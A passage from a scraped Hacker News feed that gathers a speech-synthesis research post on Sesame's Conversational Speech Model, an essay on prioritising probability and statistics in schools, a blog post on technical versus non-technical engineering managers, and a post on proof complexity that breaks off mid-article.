    Johan Schalkwyk, Ankit Kumar, Dan Lyth, Sefik Emre Eskimez, Zack Hodari, Cinjon Resnick, Ramon Sanabria, Raven Jiang

    To create AI companions that feel genuinely interactive, speech generation must go beyond producing high-quality audio—it must understand and adapt to context in real time. Traditional text-to-speech (TTS) models generate spoken output directly from text but lack the contextual awareness needed for natural conversations. Even though recent models produce highly human-like speech, they struggle with the one-to-many problem: there are countless valid ways to speak a sentence, but only some fit a given setting. Without additional context—including tone, rhythm, and history of the conversation—models lack the information to choose the best option. Capturing these nuances requires reasoning across multiple aspects of language and prosody.

To address this, we introduce the Conversational Speech Model (CSM), which frames the problem as an end-to-end multimodal learning task using transformers. It leverages the history of the conversation to produce more natural and coherent speech. There are two key takeaways from our work. The first is that CSM operates as a single-stage model, thereby improving efficiency and expressivity. The second is our evaluation suite, which is necessary for evaluating progress on contextual capabilities and addresses the fact that common public evaluations are saturated.

    Background

    One approach to modeling audio with transformers is to convert continuous waveforms into discrete audio token sequences using tokenizers. Most contemporary approaches ([1], [2]) rely on two types of audio tokens:

    1. Semantic tokens: Compact speaker-invariant representations of semantic and phonetic features. Their compressed nature enables them to capture key speech characteristics at the cost of high-fidelity representation.
    2. Acoustic tokens: Encodings of fine-grained acoustic details that enable high-fidelity audio reconstruction. These tokens are often generated using Residual Vector Quantization (RVQ) [2]. In contrast to semantic tokens, acoustic tokens retain natural speech characteristics like speaker-specific identity and timbre.

A common strategy first models semantic tokens and then generates audio using RVQ or diffusion-based methods. Decoupling these steps allows for a more structured approach to speech synthesis—the semantic tokens provide a compact, speaker-invariant representation that captures high-level linguistic and prosodic information, while the second stage reconstructs the fine-grained acoustic details needed for high-fidelity speech. However, this approach has a critical limitation: semantic tokens are a bottleneck that must fully capture prosody, but ensuring this during training is challenging.
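
For intuition, residual quantization can be sketched in a few lines (a toy encoder for illustration only, not Mimi's actual quantizer):

import numpy as np

def rvq_encode(x, codebooks):
    # Each stage quantizes the residual left over by the previous stage.
    residual, codes = x, []
    for cb in codebooks:  # cb: (K, D) array of code vectors for one level
        idx = int(np.argmin(((residual - cb) ** 2).sum(axis=-1)))
        codes.append(idx)
        residual = residual - cb[idx]
    return codes, residual  # one index per level, plus the remaining error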

    RVQ-based methods introduce their own set of challenges. Models must account for the sequential dependency between codebooks in a frame. One method, the delay pattern (figure below) [3], shifts higher codebooks progressively to condition predictions on lower codebooks within the same frame. A key limitation of this approach is that the time-to-first-audio scales poorly because an RVQ tokenizer with N codebooks requires N backbone steps before decoding the first audio chunk. While suitable for offline applications like audiobooks, this delay is problematic in a real-time scenario.

    Example of delayed pattern generation in an RVQ tokenizer with 4 codebooks
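
A toy version of the delay pattern (a hypothetical helper, just to show why the first complete frame requires N backbone steps):

def delay_pattern(frames, num_codebooks=4, pad=-1):
    # frames[t][k] is codebook k of frame t; shift codebook k right by k steps.
    T = len(frames)
    return [
        [pad] * k
        + [frames[t][k] for t in range(T)]
        + [pad] * (num_codebooks - 1 - k)
        for k in range(num_codebooks)
    ]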

    Conversational Speech Model

    CSM is a multimodal, text and speech model that operates directly on RVQ tokens. Inspired by the RQ-Transformer [4], we use two autoregressive transformers. Different from the approach in [5], we split the transformers at the zeroth codebook. The first multimodal backbone processes interleaved text and audio to model the zeroth codebook. The second audio decoder uses a distinct linear head for each codebook and models the remaining N – 1 codebooks to reconstruct speech from the backbone’s representations. The decoder is significantly smaller than the backbone, enabling low-latency generation while keeping the model end-to-end.

    CSM model inference process. Text (T) and audio (A) tokens are interleaved and fed sequentially into the Backbone, which predicts the zeroth level of the codebook. The Decoder then samples levels 1 through N – 1 conditioned on the predicted zeroth level. The reconstructed audio token (A) is then autoregressively fed back into the Backbone for the next step, continuing until the audio EOT symbol is emitted. This process begins again on the next inference request, with the interim audio (such as a user utterance) being represented by interleaved audio and text transcription tokens.

    Both transformers are variants of the Llama architecture. Text tokens are generated via a Llama tokenizer [6], while audio is processed using Mimi, a split-RVQ tokenizer, producing one semantic codebook and N – 1 acoustic codebooks per frame at 12.5 Hz. [5] Training samples are structured as alternating interleaved patterns of text and audio, with speaker identity encoded directly in the text representation.

    Compute amortization

    This design introduces significant infrastructure challenges during training. The audio decoder processes an effective batch size of B × S and N codebooks autoregressively, where B is the original batch size, S is the sequence length, and N is the number of RVQ codebook levels. This high memory burden even with a small model slows down training, limits model scaling, and hinders rapid experimentation, all of which are crucial for performance.

    To address these challenges, we use a compute amortization scheme that alleviates the memory bottleneck while preserving the fidelity of the full RVQ codebooks. The audio decoder is trained on only a random 1/16 subset of the audio frames, while the zeroth codebook is trained on every frame. We observe no perceivable difference in audio decoder losses during training when using this approach.

Amortized training process. The backbone transformer models the zeroth level across all frames (highlighted in blue), while the decoder predicts the remaining N – 1 levels, but only for a random 1/16th of the frames (highlighted in green). The top section highlights the specific frames modeled by the decoder for which it receives loss.
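
A minimal sketch of the frame subsampling in illustrative PyTorch (not our production trainer):

import torch

def amortized_decoder_mask(batch: int, seq_len: int, frac: float = 1 / 16):
    # The backbone sees every frame; the decoder only receives loss on a
    # random `frac` of frames, relieving the B x S x N memory burden.
    k = max(1, int(seq_len * frac))
    idx = torch.rand(batch, seq_len).topk(k, dim=-1).indices
    mask = torch.zeros(batch, seq_len, dtype=torch.bool)
    mask.scatter_(1, idx, True)
    return mask

# e.g. decoder_loss = (per_frame_loss * mask).sum() / mask.sum()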

    Experiments

    Dataset: We use a large dataset of publicly available audio, which we transcribe, diarize, and segment. After filtering, the dataset consists of approximately one million hours of predominantly English audio.

    Model Sizes: We trained three model sizes, delineated by the backbone and decoder sizes:

    • Tiny: 1B backbone, 100M decoder
    • Small: 3B backbone, 250M decoder
    • Medium: 8B backbone, 300M decoder

    Each model was trained with a 2048 sequence length (~2 minutes of audio) over five epochs.

    Samples

    Paralinguistics

    Sentences from Base TTS

    Foreign words

    Sentences from Base TTS

    Contextual expressivity

    Samples from Expresso, continuation after chime

    Pronunciation correction

The pronunciation correction sentence is a recording; all other audio is generated.

    Conversations with multiple speakers

    Single generation using audio prompts from two speakers

    Evaluation

    Our evaluation suite measures model performance across four key aspects: faithfulness to text, context utilization, prosody, and latency. We report both objective and subjective metrics—objective benchmarks include word error rate and novel tests like homograph disambiguation, while subjective evaluation relies on a Comparative Mean Opinion Score (CMOS) human study using the Expresso dataset.

    Objective metrics

    Traditional benchmarks, such as word error rate (WER) and speaker similarity (SIM), have become saturated—modern models, including CSM, now achieve near-human performance on these metrics.

    Objective metric results for Word Error Rate (top) and Speaker Similarity (bottom) tests, showing the metrics are saturated (matching human performance).

    To better assess pronunciation and contextual understanding, we introduce a new set of phonetic transcription-based benchmarks.

    • Text understanding through Homograph Disambiguation: Evaluates whether the model correctly pronounced different words with the same orthography (e.g., “lead” /lɛd/ as in “metal” vs. “lead” /liːd/ as in “to guide”).
    • Audio understanding through Pronunciation Continuation Consistency: Evaluates whether the model maintains pronunciation consistency of a specific word with multiple pronunciation variants in multi-turn speech. One example is “route” (/raʊt/ or /ruːt/), which can vary based on region of the speaker and context.

    Objective metric results for Homograph Disambiguation (left) and Pronunciation Consistency (right) tests, showing the accuracy percentage for each model’s correct pronunciation. Play.ht, Elevenlabs, and OpenAI generations were made with default settings and voices from their respective API documentation.

    The graph above compares objective metric results across three model sizes. For Homograph accuracy we generated 200 speech samples covering 5 distinct homographs—lead, bass, tear, wound, row—with 2 variants for each and evaluated pronunciation consistency using wav2vec2-lv-60-espeak-cv-ft. For Pronunciation Consistency we generated 200 speech samples covering 10 distinct words that have common pronunciation variants—aunt, data, envelope, mobile, route, vase, either, adult, often, caramel.

    In general, we observe that performance improves with larger models, supporting our hypothesis that scaling enhances the synthesis of more realistic speech.

    Subjective metrics

    We conducted two Comparative Mean Opinion Score (CMOS) studies using the Expresso dataset to assess the naturalness and prosodic appropriateness of generated speech for CSM-Medium. Human evaluators were presented with pairs of audio samples—one generated by the model and the other a ground-truth human recording. Listeners rated the generated sample on a 7-point preference scale relative to the reference. Expresso’s diverse expressive TTS samples, including emotional and prosodic variations, make it a strong benchmark for evaluating appropriateness to context.

    In the first CMOS study we presented the generated and human audio samples with no context and asked listeners to “choose which rendition feels more like human speech.” In the second CMOS study we also provide the previous 90 seconds of audio and text context, and ask the listeners to “choose which rendition feels like a more appropriate continuation of the conversation.” Eighty people were paid to participate in the evaluation and rated on average 15 examples each.

    Subjective evaluation results on the Expresso dataset. No context: listeners chose “which rendition feels more like human speech” without knowledge of the context. Context: listeners chose “which rendition feels like a more appropriate continuation of the conversation” with audio and text context. 50:50 win–loss ratio suggests that listeners have no clear preference.

    The graph above shows the win-rate of ground-truth human recordings vs CSM-generated speech samples for both studies. Without conversational context (top), human evaluators show no clear preference between generated and real speech, suggesting that naturalness is saturated. However, when context is included (bottom), evaluators consistently favor the original recordings. These findings suggest a noticeable gap remains between generated and human prosody in conversational speech generation.

    Open-sourcing our work

    We believe that advancing conversational AI should be a collaborative effort. To that end, we’re committed to open-sourcing key components of our research, enabling the community to experiment, build upon, and improve our approach. Our models will be available under an Apache 2.0 license.

    Limitations and future work

    CSM is currently trained on primarily English data; some multilingual ability emerges due to dataset contamination, but it does not perform well yet. It also does not take advantage of the information present in the weights of pre-trained language models.

    In the coming months, we intend to scale up model size, increase dataset volume, and expand language support to over 20 languages. We also plan to explore ways to utilize pre-trained language models, working towards large multimodal models that have deep knowledge of both speech and text.

    Ultimately, while CSM generates high quality conversational prosody, it can only model the text and speech content in a conversation—not the structure of the conversation itself. Human conversations are a complex process involving turn taking, pauses, pacing, and more. We believe the future of AI conversations lies in fully duplex models that can implicitly learn these dynamics from data. These models will require fundamental changes across the stack, from data curation to post-training methodologies, and we’re excited to push in these directions.

    Join us

    If you’re excited about building the most natural, delightful, and inspirational voice interfaces out there, reach out—we’re hiring. Check our open roles.

    ]]>
    https://www.sesame.com/research/crossing_the_uncanny_valley_of_voice#demo hacker-news-small-sites-43200400 Fri, 28 Feb 2025 00:55:00 GMT
    <![CDATA[Standup Comedy by Claude]]> thread link) | @FergusArgyll
    February 27, 2025 | https://gally.net/temp/20250225claudestandup2.html | archive.org

    Unable to retrieve article]]>
    https://gally.net/temp/20250225claudestandup2.html hacker-news-small-sites-43200246 Fri, 28 Feb 2025 00:27:33 GMT
    <![CDATA[Show HN: Upplai – AI Feedback on Resumes and Cover Letters]]> thread link) | @soubhik
    February 27, 2025 | https://you.uppl.ai/login?invitation=ycombinator | archive.org

    Unable to retrieve article]]>
    https://you.uppl.ai/login?invitation=ycombinator hacker-news-small-sites-43200190 Fri, 28 Feb 2025 00:21:21 GMT
    <![CDATA[Tesla Powerwall 3 Alternatives]]> thread link) | @Vsolar
    February 27, 2025 | https://www.virtuesolar.com/2025/02/17/tesla-powerwall-3-alternatives/ | archive.org

    Unable to retrieve article]]>
    https://www.virtuesolar.com/2025/02/17/tesla-powerwall-3-alternatives/ hacker-news-small-sites-43200179 Fri, 28 Feb 2025 00:20:29 GMT
    <![CDATA[Math That Matters: The Case for Probability over Polynomials]]> thread link) | @herbertl
    February 27, 2025 | https://anandsanwal.me/math-eduction-more-probability-statistics-less-calculus/ | archive.org


    This essay first appeared in my newsletter. Sign up here if interested in F’ing up the status quo and fixing education.


    When I was in high school, students divided into two camps: those who “got” math and those who believed they simply weren’t “math people.” 

I was one of the “got” math people, spending countless hours on trigonometry and eventually AP Calculus, where I worked through derivatives and all sorts of ‘fancy’ math. Deep down, I knew what this was really about – it wasn’t about practical skills but about signaling I was smart, just like the other high-achiever types. It wasn’t about learning. It was just another credential for the college application rat race.

    Meanwhile, some of my friends struggled with math not because they lacked ability, but because the content was so disconnected from anything they cared about. When any of us asked the teacher when we’d ever use this stuff, she gave the standard response about college preparation and developing abstract thinking skills. 

    But looking back now, I realize we were all learning the wrong math – both the students who excelled and those who gave up. It is yet another example of how schools fail teenagers.

The math most useful in real life isn’t calculus or advanced trigonometry – it’s probability and statistics. And yet our education system treats these subjects as afterthoughts, typically confined to a single elective course, usually in senior year, if taught at all.

    This is backwards.

    Consider what probability and statistics let you do: 

    • understand risk in everyday decisions
    • detect misleading claims in news articles
    • make smarter choices about money; and
    • grasp uncertainty in everything from weather forecasts to medical tests

    A teenager who understands basic probability can immediately see through the false promises of gambling apps targeting their age group. One who grasps statistical significance can better interpret health studies they encounter about supplements making grand promises about physical health. 

    These aren’t “someday you might need this” skills – they’re immediately useful.

    The evidence and arguments for emphasizing probability and statistics is compelling:

    • Daniel Kahneman’s Nobel Prize-winning research reveals how humans systematically misjudge probabilities in predictable ways. His work with Amos Tversky shows that even simple statistical concepts like base rates and regression to the mean are counterintuitive to most people, leading to poor decisions in everything from medical diagnoses to financial investments. Teaching probability early could help students avoid these cognitive traps.
    • Jordan Ellenberg, in “How Not to Be Wrong,” demonstrates through dozens of examples how statistical thinking illuminates everything from lottery scams to political gerrymandering. He argues that the mathematics most useful for citizenship and everyday life isn’t calculus but the ability to reason about uncertainty and variation – skills that probability and statistics directly develop.
    • Bryan Caplan explicitly argues in “The Case Against Education” that our math curriculum teaches skills with little real-world application for most students. He points out the mismatch between the predominantly algebraic-calculus track and the actual mathematical needs of most careers and life situations, which more often involve understanding data, risk, and basic statistical concepts.
    • Arthur Benjamin, in his famous TED talk and subsequent writings, makes the case that statistics should replace calculus as the “summit” of high school mathematics. He argues that for most students, statistical literacy is far more valuable than calculus in a world increasingly driven by data and probability, yet our curriculum treats statistics as optional while pushing students toward calculus.
    • Andrew Gelman, one of today’s leading statisticians, has written extensively about restructuring mathematical education around understanding uncertainty rather than abstract proofs. He advocates for teaching statistics through simulation and real problems, suggesting that even complex statistical concepts can be made intuitive when presented in contexts that matter to students.

    To make room for more probability and statistics, we need to be willing to cut something. I’ve previously argued against Shakespeare and other subjects here.

    But if we’re focused on what to downshift on within math, the obvious candidates are topics like advanced trigonometry, detailed polynomial factoring, and calculus for non-STEM students. 

    These are precisely the topics that prompt eye rolls and “when will we use this?” questions from students – because they’re right. Most won’t use these skills unless they pursue specific technical careers.

    But teaching probability and statistics well requires more than just changing the curriculum – it requires making it engaging. Instead of abstract problems about pulling colored balls from urns, we should use real-world applications that matter to students:

• Sports Analytics: Students could analyze their fantasy sports team performance using probability distributions, calculate the true value of different player stats, or determine whether a winning streak is skill or random chance. A basketball fan might learn expected value by calculating whether a player should shoot a 3-pointer or drive for a 2 based on their shooting percentages – mathematics that suddenly matters when applied to their favorite team (a worked example follows this list).
    • Social Media Content Creation: For aspiring YouTubers or TikTok creators, statistical thinking offers immediate value. Students could analyze video performance data to determine what factors correlate with higher engagement, use A/B testing to compare different title formats, or apply probability to predict which content categories have the best chance of going viral based on platform algorithm patterns.
    • Gaming Strategy: Video games provide a perfect laboratory for probability concepts. Students could calculate drop rates for rare items, optimize resource allocation in strategy games, or analyze win rates with different character builds. The mathematics of expected value directly translates to better gaming decisions, creating an immediate connection between abstract concepts and personal interests.
    • Music and Streaming Analytics: Students could examine the probability distributions of streams across different artists, analyze what makes songs trend on platforms like Spotify, or calculate the expected payout from streaming versus other revenue sources – connecting statistical thinking to their passion for music.
    • Understanding Social Dynamics: Probability helps make sense of social phenomena students experience daily. What are the chances of two people in their class sharing a birthday? How can they understand selection bias in social circles? Why do certain rumors spread faster than others? These questions make statistical concepts relevant to their immediate social world.
    • Consumer Decision-Making: Students regularly make purchasing decisions. Statistical literacy helps them analyze whether a sale is actually a good deal, understand the risk/reward of extended warranties, or calculate the expected lifetime cost of different electronics – skills they can apply immediately at the mall or online.
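
Here is that 3-versus-2 calculation spelled out, with made-up shooting percentages:

p3, p2 = 0.36, 0.54        # hypothetical 3-point and 2-point shooting percentages
ev3, ev2 = 3 * p3, 2 * p2  # expected points per attempt
print(ev3, ev2)            # 1.08 vs 1.08: at these numbers, either shot is fine

Nudge either percentage and the “right” shot flips, which is exactly the kind of immediately useful reasoning this curriculum would reward.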

    When students see immediate and useful applications, the dreaded “when will we use this?” question disappears.

    The benefits of this shift would be profound. We’d graduate students better equipped to:

    • Make informed personal decisions about money, health, and risk
    • Understand scientific claims and evaluate evidence
    • Navigate an increasingly data-driven world
    • Think probabilistically about complex problems
    • Detect misleading statistics and flawed studies

    I will digress and offer one more slightly detailed and pressing reason to prioritize probability education: the explosion of sports betting among young people, particularly young men. 

    As states legalize gambling and betting apps target younger audiences, many students will encounter these platforms and never truly understand the mathematics behind them. A strong foundation in probability & mathematical reasoning would help them see through the carefully crafted illusion of easy money, understand concepts like house edge and expected value, and recognize how betting odds are strategically designed to favor the house.

    Rather than simply telling students to avoid sports gambling (a strategy with limited effectiveness akin to abstinence-only sex education), we could equip them with the mathematical tools to understand why the vast majority of bettors lose money over time. This is mathematics as a form of protection against predatory industries and companies.
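
To see why most bettors lose over time, take the standard -110/-110 point-spread line (textbook numbers, not tied to any particular sportsbook):

stake, profit = 110, 100                  # risk $110 to win $100 at -110 odds
breakeven = stake / (stake + profit)      # 0.524: must win 52.4% just to break even
ev_coinflip = 0.5 * profit - 0.5 * stake  # -$5.00 per bet for a 50/50 bettor
print(f"{breakeven:.1%}", ev_coinflip)

A student who can do this calculation understands the house edge better than any warning label could teach them.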

    Even for STEM-bound students, stronger foundations in probability and statistics would be valuable. Many cutting-edge fields like AI, genomics, and climate science rely heavily on statistical methods. A student heading into computer science is more likely to need knowledge of probabilistic algorithms than advanced calculus.

Some will object that reducing traditional mathematics could harm students’ abstract reasoning abilities. But probability and statistics develop these same skills while being more practical. TBH, “abstract reasoning” is often the catch-all reason given when teachers can’t really answer a student’s “when will I use this?” question. It’s a thoughtful-sounding way of saying “Because I told you so”. Understanding confidence intervals requires just as much abstract thinking as understanding the quadratic formula – but one has far more real-world applications than the other.

    Here’s what a reformed curriculum might look like:

    • Middle School: Basic probability concepts, data literacy, and simple statistical measures
    • 9th Grade: Core algebra with probability applications
    • 10th Grade: Geometry with data visualization and spatial statistics
    • 11th Grade: Advanced algebra with statistical inference and modeling
    • 12th Grade: Advanced statistics and data analysis (with calculus as an optional track for STEM-focused students)

    This isn’t about making math easier or less rigorous – it’s about making it more relevant. 

    The mathematical challenges of understanding probability and working with statistics are just as rigorous as traditional topics. The difference is that students can see why these challenges matter.

    The world is becoming more complex and data-driven. The ability to think probabilistically and understand statistics isn’t just useful – it’s becoming essential. We owe it to our students to teach them the mathematical tools and associated reasoning they’ll actually need to navigate this world. The sooner we make this shift, the better equipped the next generation will be to face the challenges ahead.

    Some of the brightest minds in mathematics education – from Kahneman to Gelman – have been pointing us in this direction. It’s time we listened.

    The real opportunity here isn’t just better preparing students for some abstract future. It’s about making mathematics immediately relevant to their lives today. When students analyze the statistics of their favorite games, calculate the real odds of social phenomena they care about, or use probability to understand the news they consume, math transforms from a chore into a powerful lens for seeing their world more clearly.

    A shift toward probability and statistics could make math more democratic too. Traditional math curricula often function as sorting mechanisms, separating “math people” from everyone else. Statistical thinking, with its blend of quantitative skills and real-world contexts, can be more approachable and engaging for a broader range of students. Done right, it could help more students discover that they are “math people” after all.

    Building an education system around what’s relevant now, rather than around outdated notions of what might be useful someday, isn’t lowering our standards. It’s raising them by demanding that what we teach actually matters. The cost of continuing to teach the wrong math isn’t just wasted time—it’s a missed opportunity to give students tools they could be using every day.

    ]]>
    https://anandsanwal.me/math-eduction-more-probability-statistics-less-calculus/ hacker-news-small-sites-43199732 Thu, 27 Feb 2025 23:24:44 GMT
    <![CDATA[Who's Better for Engineering Teams – Technical or Non-Technical Managers?]]> thread link) | @execubot0x1
    February 27, 2025 | https://execefficiency.ai/en/blog/execubot-whos-better-for-engineering-teams-technical-or-non-technical-managers | archive.org

    The Two Types of Engineering Team Managers

Engineering team managers tend to come from one of two backgrounds: technical or managerial. Either type can work well for an engineering team. Both come with advantages and disadvantages, and the right manager can overcome the disadvantages.

Fiery debates flood the tech world's forums and meeting rooms about whether a technical background determines a manager's success. Regardless of technical experience, a great manager acknowledges their shortcomings in order to unite their team.

    The Technical Manager

Technical managers lead their teams with field experience and knowledge. They've worked on engineering teams before and know the ins and outs of technical processes. These managers have built-in credibility with their engineers because of shared credentials.

They often stay up to date with technical advancements to remain on par with the engineers they lead. Technical managers share a technical language with engineers, making for easy communication on project specifics. They understand realistic time frames around technical and coding deadlines. They've likely progressed into management on the strength of their technical experience—many were formerly lead developers or senior software engineers.

    Advantages of a Technical Manager

Engineering teams often prefer a technical manager. Common ground in technical experience gives a technical manager authority on tech projects.

    • Common language: A technical manager understands the language and complexities of tech. A shared language between manager and team can create efficiency.
• Technical decision-making: Technical managers are typically former senior engineers and thus able to guide decisions on technical projects. Their experience and up-to-date technical knowledge let them set a strategy for success.

    Cons of a Technical Manager

• Outdated experience: Some technical managers work to stay current on the latest technical knowledge, but no amount of studying gives them the same edge as engineers fresh out of school. Managers have to spend most of their time managing their teams and projects, so their technical knowledge may fall behind current trends.
• Leadership gaps: Technical managers have spent more time in tech than in management, so their leadership skills may need refinement. Strong technical contributions don't automatically translate into managing people and navigating workplace politics.

    The Non-Technical Manager

A non-technical manager has limited or no technical experience. They may have basic tech knowledge—enough, say, to have passed a coding screen—but they were never part of software teams long-term, and instead have experience as project managers or administrators in other fields.

Instead of deep technical knowledge, they're armed with people and project management backgrounds. Non-technical managers come to the table knowing how to navigate corporate politics and stakeholder communications. They must trust their team's technical skills, and earn their team's trust in their leadership in return.

    Advantages of a Non-Technical Manager

• Management focus: Non-technical managers focus on managing their team, since they may not have a hand in technical contributions or decisions. This singular focus gives leadership matters the priority they deserve.
• Business communication: Non-technical managers know what they don't know, so they can communicate with other non-technical parties in plain terms that a technical person would otherwise have to break down. Non-technical managers may be better equipped to deal with stakeholders and business partners without getting bogged down in technical details.

    Cons of a Non-Technical Manager

    • Lack of rapport: A non-technical manager may have a longer bridge to build trust with their technical team than a technical manager would. The gaps in their technical knowledge may cause engineers to disregard a non-technical manager's authority. They would need to build rapport and trust with their team in order to best work with them.
• Translation necessary: A non-technical manager's lack of technical knowledge necessitates translation from engineers. This extra step adds time and potential frustration for the team.

    How to Succeed as a Technical Team Manager - Regardless of Your Background

    The timeless principles of good management can surpass technical experience. Both technical and non-technical managers can work in their strengths and acknowledge their weaknesses. The type of technical background a manager has does not have to define their success.

    Here are the simple ways both types of managers can be great leaders:

• Know what you don't know: A humble leader earns the trust of their team and partners. Admitting what they don't know opens up discussions about how best to deploy the team to reach its goals. A lack of knowledge in certain areas also creates space for learning, as well as opportunities for delegation.
• Utilize resources and team: Managers can make up for their weaknesses by delegating appropriately to the right resources and engineers. Assigning tasks such as translating difficult technical details for stakeholders can give engineers opportunities to build additional skills.

    Regardless of technical experience, managers can still commit the sins of management and lose their team's trust:

• Micromanaging: Micromanagement reveals a manager's distrust in their team. Engineers can be reluctant to work to their full potential with a manager breathing down their neck and critiquing every move. This shows up in technical managers who nitpick technical details, and in non-technical managers who doubt their engineers' knowledge.
• Communication breaks: Communication is the link that connects people to each other, and it is essential for teams working toward shared goals. Poor communication by managers leads to mistakes, misunderstandings, and an inability to get things done on time. Broken communication also includes a failure to listen to others.

    Conclusion

Engineers and companies may have preferences about whether their managers have technical backgrounds. There may be no universal answer to which type of manager is best suited to technical teams, as each individual manager has different strengths and faults.

A manager can rise above their shortcomings, whether in technical or management knowledge, by acknowledging them and putting their team's success ahead of their own ego.

    ]]>
    https://execefficiency.ai/en/blog/execubot-whos-better-for-engineering-teams-technical-or-non-technical-managers hacker-news-small-sites-43199571 Thu, 27 Feb 2025 23:06:09 GMT
    <![CDATA[What Complexity Theory Can Teach Mathematicians.]]> thread link) | @SeniorMars
    February 27, 2025 | https://seniormars.com/posts/multiple-proofs/ | archive.org

    Motivation

    Every mathematician has, at some point, encountered a new proof of a theorem they already knew was true. Why do we do this? Once a result is proven, it’s settled, right? Well, not quite.

    Mathematics isn’t just about knowing whether something is true—it’s about understanding why it’s true. And as it turns out, different proofs often provide different insights. But what if there’s more? What if there exists an optimal proof—a proof that, in some sense, is the best?

    That’s where complexity theory comes in. And before you say, “But I’m not a computer scientist!”, let’s talk about why you, as a mathematician, should care. I was specifically inspired to make this blog by a thread I saw on Reddit, but I wanted to go into more detail about my thoughts.

    Proofs Are Programs: The Curry-Howard Lens

    One of the most important ideas in mathematical logic is that proofs can be viewed as programs. The Curry-Howard correspondence tells us:

    • A theorem is a type.
    • A proof is a program.
    • Proof normalization is computation.

    From this perspective, every proof we construct is not just a verification of truth—it’s a computational object. And like any computational object, we can ask: how efficient is it?

    For example, if two different proofs of a theorem correspond to two different algorithms, then one might be more efficient than the other. A proof that constructs a witness explicitly (a constructive proof) might yield an algorithm that runs in polynomial time, while a proof relying on non-constructive methods might encode an exponential search.
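To see the correspondence in miniature, here is a sketch in Lean 4 (any proof assistant would illustrate the same point): the theorem is a type, and the proof we write is literally a program of that type.

-- The "theorem" A → (A → B) → B is a type; this definition is at once
-- a proof of it and a program: apply the function f to the value a.
def modusPonens {A B : Prop} (a : A) (f : A → B) : B := f a

Normalizing this proof—substituting arguments and reducing—is exactly running the program, which is what the third bullet above means.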

    And this isn’t just theoretical. Gödel himself saw this connection.

    Gödel, von Neumann, and the Birth of Complexity

    In 1956, Gödel wrote a letter to von Neumann that, in retrospect, essentially anticipated complexity theory before it existed. He asked:

    “One can obviously easily construct a Turing machine, which for every formula F in first order predicate logic and every natural number n, allows one to decide if there is a proof of F of length n. The question is how fast φ(n) grows for an optimal machine.”

    Gödel goes on to speculate about the implications if certain mathematical problems could be solved much more efficiently than by exhaustive search:

    “It would obviously mean that in spite of the undecidability of the Entscheidungsproblem, the mental work of a mathematician concerning Yes-or-No questions could be completely replaced by a machine.”

    Clearly, Gödel was asking something fundamental: Is there a way to measure the complexity of mathematical thought and be able to automate it?

    He was, in essence, formulating what we now recognize as the $\mathcal{P} = \mathcal{N}\mathcal{P}$ problem. If a proof (or algorithm) exists for a problem, how efficiently can we find it? This directly impacts how we think about proofs: If an optimal proof of a theorem exists, how complex is it? How long does it take to verify? Can we systematically find short proofs?

    A Theorem Is an Equivalence Class of Proofs

If there is one thing I want you to take away from this blog, it's this:

    “A theorem is an equivalence class of all its proofs.”

    This is a profound way to think about mathematical truth. A theorem isn’t just a single fact—it’s the collection of all possible ways to derive it. Each proof offers a different perspective, a different computational structure, and sometimes, a different level of efficiency.

    This explains why we care about multiple proofs:

    • They expose new techniques that can be applied elsewhere.
    • They show connections between different areas of mathematics.
    • They reveal computational properties that might not be obvious from a single proof.

    Proof Systems and Axiomatic Differences

Now, we need to remember that proofs don't exist in isolation—they exist within proof systems, which determine what rules of inference are allowed. Different axiomatic systems can lead to different styles of proofs and even different results.

    In some proof systems, a statement might have an elegant, short proof, while in others, it might require pages of complex derivations. Consider (as expressed by Avi Wigderson in $\mathcal{P}, \mathcal{N}\mathcal{P}$ and mathematics – a computational complexity perspective):

    • Hilbert’s Nullstellensatz: Theorems are inconsistent sets of polynomial equations. Proofs are linear combinations of polynomials.
    • Group theory: Theorems are words that reduce to the identity element. Proofs are sequences of substitutions.
    • Reidemeister moves in knot theory: Theorems are knots that can be unknotted. Proofs are sequences of diagram transformations.
    • von Neumann’s Minimax theorem: Theorems are optimal strategies in zero-sum games. Proofs are arguments showing the strategies are equivalent.

    Each proof system has its own complexity. Some proof systems require exponentially long proofs for certain theorems that are polynomial-length in others. This is one reason why multiple proofs matter—switching proof systems can dramatically affect proof complexity.

    The Pigeonhole Principle and Proof Complexity

    To make this concrete, let’s consider a classic example: the pigeonhole principle.

    The pigeonhole principle states that if you put more pigeons than pigeonholes (say, $ m $ pigeons into $ n $ holes with $ m > n $), then at least one hole must contain multiple pigeons. Trivial, right? But proving this formally can be surprisingly difficult.

    Different proof systems encode this principle differently:

    • Algebraic proof: Using polynomials over $ GF(2) $.
    • Geometric proof: Framing it as an optimization problem.
    • Logical proof: Using Boolean formulas.

Each of these proof techniques has different proof complexity. For example, in resolution proof systems (used in SAT solvers), the pigeonhole principle requires exponentially long proofs [1]. But in other systems, it might have polynomial-length proofs. What does this mean? It means that how we choose to prove a theorem can fundamentally affect its computational efficiency.
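Concretely, in the resolution setting the principle is encoded as a propositional contradiction over variables $p_{i,j}$ ("pigeon $i$ sits in hole $j$"):

$$ \bigwedge_{i=1}^{m} \Big( \bigvee_{j=1}^{n} p_{i,j} \Big) \;\wedge\; \bigwedge_{j=1}^{n} \, \bigwedge_{1 \le i < i' \le m} \big( \lnot p_{i,j} \lor \lnot p_{i',j} \big) $$

For $m > n$ this formula is unsatisfiable—that is precisely the pigeonhole principle—and Haken's classic lower bound shows that resolution refutations of it must have exponential size.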

This is not just an esoteric fact. It's a key issue in theoretical computer science: Do short proofs always exist? If $ \mathcal{P} = \mathcal{N}\mathcal{P} $, then every theorem that has a short proof also has one we can find efficiently. If $ \mathcal{P} \neq \mathcal{N}\mathcal{P} $, then some theorems may have short proofs that are computationally infeasible to discover.

    Are Some Proofs “Optimal”?

    If every proof corresponds to an algorithm, we can ask whether there exists an optimal proof—the shortest, most efficient proof possible. For some theorems, we suspect there’s an inherent lower bound on proof length. In fact, many results in proof complexity are lower bound arguments: showing that some theorems require long proofs in certain systems.

    For example:

• The Paris-Harrington theorem, a finitary version of Ramsey's theorem, cannot be proven in Peano arithmetic despite being a simple combinatorial statement [2].
    • The Boolean formula complexity of pigeonhole principles suggests that some tautologies require exponentially long proofs in resolution-based proof systems.

    If we had a general method to find the shortest proof of a theorem, we could answer fundamental questions in complexity theory. But this remains an open problem.

    Constructive vs. Non-Constructive Proofs

    One of the most practical consequences of proof complexity is the difference between constructive and non-constructive proofs.

    • A constructive proof explicitly produces a witness or an algorithm that establishes the truth of the theorem.
    • A non-constructive proof shows that a solution must exist but does not necessarily give a method to find it.

    Why does this distinction matter? Because constructive proofs often translate directly into implementable algorithms. If a proof is constructive, it tells us that something is true and gives us a way to compute it. In contrast, a non-constructive proof might establish existence without providing an efficient method of finding a solution.
